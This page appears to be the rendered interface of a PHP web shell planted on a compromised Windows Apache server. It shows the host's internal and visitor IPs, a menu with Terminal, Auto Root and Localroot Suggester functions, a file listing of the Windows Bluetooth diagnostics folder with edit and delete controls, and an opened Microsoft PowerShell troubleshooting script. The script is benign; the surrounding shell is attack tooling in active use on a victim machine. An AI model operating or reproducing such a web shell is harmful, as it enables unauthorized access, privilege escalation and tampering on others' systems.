Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.204
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
Windows /
diagnostics /
system /
Bluetooth /
Delete
Unzip
Name
Size
Permission
Date
Action
en-US
[ DIR ]
drwxrwxrwx
2023-03-23 12:54
pt-BR
[ DIR ]
drwxrwxrwx
2019-12-07 15:53
BluetoothDiagnosticUtil.dll
68.5
KB
-rw-rw-rw-
2024-05-16 16:43
CL_Utility.ps1
33.03
KB
-rw-rw-rw-
2019-12-07 10:09
DiagPackage.diagpkg
16.15
KB
-rw-rw-rw-
2019-12-07 10:09
DiagPackage.dll
2.5
KB
-rw-rw-rw-
2019-12-07 10:09
RC_BTRadioOff.ps1
1.19
KB
-rw-rw-rw-
2019-12-07 10:09
RC_CheckBT.ps1
1.17
KB
-rw-rw-rw-
2019-12-07 10:09
RC_Disabled.ps1
2.01
KB
-rw-rw-rw-
2019-12-07 10:09
RC_DriverProblem.ps1
2.23
KB
-rw-rw-rw-
2019-12-07 10:09
RC_OtherIssue.ps1
1.69
KB
-rw-rw-rw-
2019-12-07 10:09
RC_PendingRestart.ps1
1.1
KB
-rw-rw-rw-
2019-12-07 10:09
RS_BTRadioOff.ps1
1.39
KB
-rw-rw-rw-
2019-12-07 10:09
RS_CheckBT.ps1
747
B
-rw-rw-rw-
2019-12-07 10:09
RS_Disabled.ps1
1.19
KB
-rw-rw-rw-
2019-12-07 10:09
RS_DriverProblem.ps1
1.28
KB
-rw-rw-rw-
2019-12-07 10:09
RS_OtherIssue.ps1
712
B
-rw-rw-rw-
2019-12-07 10:09
RS_PendingRestart.ps1
620
B
-rw-rw-rw-
2019-12-07 10:09
TS_Main.ps1
5.95
KB
-rw-rw-rw-
2019-12-07 10:09
VF_BTRadioOff.ps1
1.34
KB
-rw-rw-rw-
2019-12-07 10:09
Save
Rename
# Copyright © 2016, Microsoft Corporation. All rights reserved. # :: ======================================================= :: # This script is invoked from TS_Main.ps1 # TS_Main.ps1 passes only $problemDeviceID parameter # This script is to detect error codes NOT defined in CL_Utility.ps1 and !errorCode22 Param($problemDeviceID) #==================================================================================== # Initialize #==================================================================================== Import-LocalizedData -BindingVariable Strings_RC_OtherIssue -FileName CL_LocalizationData [bool]$detected = $false #==================================================================================== # Load Utilities #==================================================================================== . ./CL_Utility.ps1 #==================================================================================== # Main #==================================================================================== if(![string]::IsNullOrWhiteSpace($problemDeviceID)) { $problemDevice = (Get-WmiObject -Class CIM_LogicalDevice | ? {($_.DeviceID -eq $problemDeviceID)}) $problemDeviceName = $problemDevice.Name $errorCode = $problemDevice.ConfigManagerErrorCode if(($knownErrorCodes.Keys -notcontains $errorCode) -and ($errorCode -ne 22)) { $detected = $true GetDeviceInfoAndWriteTrace $problemDeviceID "DetectedDeviceOtherError" } } Update-DiagRootCause -ID 'RC_OtherIssue' -IID $problemDeviceID -Detected $detected -Parameter @{'ProblemDeviceID'= $problemDeviceID;'ProblemDeviceName'=$problemDeviceName;'ErrorCode'=$errorCode} return $detected